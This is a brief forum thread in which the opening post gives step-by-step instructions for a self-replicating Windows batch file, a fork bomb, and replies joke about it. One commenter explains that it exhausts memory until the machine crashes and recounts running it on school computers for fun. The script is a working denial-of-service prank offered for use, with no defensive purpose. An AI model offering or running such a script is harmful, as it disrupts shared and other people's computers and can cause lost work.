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| 02 Oct 2011 04:26 PM |
1. Open Notepad. 2. Type the following (or copy and paste). @echo off :START start a.bat goto START 3. Save your file as a.bat. 4. Click on the file |
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| 02 Oct 2011 04:28 PM |
| its even easy for people new to scripting |
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| 02 Oct 2011 04:29 PM |
| I know what that does, and I don't even know Batch. |
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| 02 Oct 2011 04:30 PM |
| see it really is easy for people new to script |
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| 02 Oct 2011 04:33 PM |
| Hey! I'm not new to scripting! |
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| 02 Oct 2011 04:39 PM |
| No crashy mah computer pl0x |
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| 02 Oct 2011 04:42 PM |
It will just keep opening up the same thing over and over again and use up all the memory. Then you will get a "critical error" on your computer and it will shut down.
I did this at school a few years ago. It was rather funny to watch the kids sitting beside me. XD |
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